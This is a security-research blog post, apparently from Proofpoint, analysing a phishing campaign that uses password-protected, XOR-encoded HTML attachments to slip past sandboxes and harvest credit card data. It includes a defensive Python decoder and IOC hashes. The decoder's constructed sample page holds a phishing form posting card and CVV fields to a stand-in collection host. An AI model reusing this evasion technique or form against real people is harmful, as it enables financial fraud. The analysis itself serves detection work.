Phishing Actors Take a Cue From Malware-Distributing Brethren


Overview

Recently, Proofpoint researchers have observed a number of email campaigns with attached password-protected malicious documents. These documents are primarily used to distribute malware including Cerber ransomware and the Ursnif banking Trojan, with document passwords included in the body of the email. The use of password-protected documents makes them difficult to execute in automated sandbox environments, circumventing a variety of anti-malware products. At the same time, including the password in the email makes it easy for recipients to open the document while password protection adds a sense of legitimacy.

Last week, however, we observed a phishing campaign using this technique designed to harvest credit card account numbers and personal information from account holders.

Analysis

The email sample that we analyzed was personalized with the recipient's name and what appear to be the starting digits of their credit card account number. The starting digits of card numbers are standardized by issuer, though, so this only adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient's card number. The emails also use stolen branding and social engineering to create a sense of urgency, encouraging the recipient to update security information for their "new chip card" (Figure 1).


Figure 1: Personalized phishing email with HTML attachment

The email includes an HTML attachment that is protected by a password included in the email. The HTML attachment is also XOR-encoded, again making dynamic analysis more difficult. The encoded attachment is shown in Figure 2:


Figure 2: XOR-encoded HTML file attached to lure email (split for screen wrap)

While the password-protected Microsoft Word documents we normally see in malware campaigns make use of Word's built-in functionality to add passwords, this is an HTML attachment, so it instead uses JavaScript to implement the password protection. The script pah.js (Figure 3) decrypts the XOR-encoded HTML when the user enters the password provided in the body of the email (Figure 4).


Figure 3: Comment on pah.js JavaScript file that accepts a password and decodes the attached HTML file


Figure 4: Password prompt generated when the recipient opens the attached HTML file

If the user enters the password correctly, they will be presented with a fairly typical credit card phishing template, complete with stolen branding (redacted - Figure 5):


Figure 5: HTML phishing template after successful decoding (split for screen wrap)

The form will submit the credentials in the same manner as we see in typical credential phishing, via HTTP POST.


Figure 6: Code snippet from HTML file featuring POST method for submitting phished information
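As an added example (not the campaign's pah.js, which is not reproduced on this page), the following Python shows how an analyst can recover such a page statically, without rendering the attachment in a browser. It assumes the attachment body is a hex string XOR-ed with the emailed password as a repeating key (an assumption; the real encoding scheme is not detailed above), rejects a wrong password by checking for HTML markers, and pulls the form's POST target out of the decoded page so it can be blocked. The sample page, password and URL are constructed for the example.

```python
import re
from itertools import cycle
from typing import List, Optional, Tuple

# Constructed stand-in for the decoded phishing page; not the real template.
SAMPLE_HTML = (
    "<html><body><h1>Update your chip card</h1>"
    '<form method="POST" action="http://phish.example/collect.php">'
    '<input name="card"><input name="cvv"></form></body></html>'
)

def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is symmetric, so this both encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def looks_like_html(data: bytes) -> bool:
    """Cheap plausibility check: a correct password yields recognisable HTML."""
    text = data.lower()
    return b"<html" in text or b"<form" in text or b"<!doctype html" in text

def decode_attachment(encoded_hex: str, password: str) -> Optional[bytes]:
    """Decode with the password printed in the lure email; None if the result is not HTML."""
    decoded = xor_with_key(bytes.fromhex(encoded_hex), password.encode())
    return decoded if looks_like_html(decoded) else None

FORM_RE = re.compile(r"<form\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']([^"\']*)["\']')

def extract_form_targets(html: bytes) -> List[Tuple[str, str]]:
    """Return (method, action) pairs: the endpoints the phished data is POSTed to."""
    targets = []
    for tag in FORM_RE.findall(html.decode("utf-8", errors="replace")):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        targets.append((attrs.get("method", "GET").upper(), attrs.get("action", "")))
    return targets

def build_sample(password: str) -> str:
    """Produce a constructed encoded attachment for testing the decoder."""
    return xor_with_key(SAMPLE_HTML.encode(), password.encode()).hex()

if __name__ == "__main__":
    pw = "Chip2016"  # constructed; stands in for the password in the email body
    blob = build_sample(pw)
    page = decode_attachment(blob, pw)
    print(extract_form_targets(page))      # [('POST', 'http://phish.example/collect.php')]
    print(decode_attachment(blob, "wrong"))  # None
```

The extracted action URL is the indicator worth feeding to web proxies and mail filters, since the decoded HTML itself never touches the network until the victim submits the form.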

Conclusion

Credential and credit card phishing are nearly as old as cybercrime itself. This hasn't stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password-protected document attachments to bypass anti-malware technologies and give recipients a false sense of security. The bottom line for end users, though, is that the appearance of legitimacy, even including personalization and convincing branding, does not equal safety online.

Indicators of Compromise (IOCs)

IOC                                                               IOC Type  Description
e5bbbcea49bf6ba0de0b7d614001be29                                  MD5       Email sample
d0357e7a96189f0f25099fc84a650fa9546184c5f9263ef06b449b7d02c4f692  SHA256    Email sample
3b01a61c484e7148df640b55f54240e3                                  MD5       HTML attachment
6ee9d70f02bf71df64a06324d2d5cd32875dc0ab0ef2c7a8abd566f8654a8432  SHA256    HTML attachment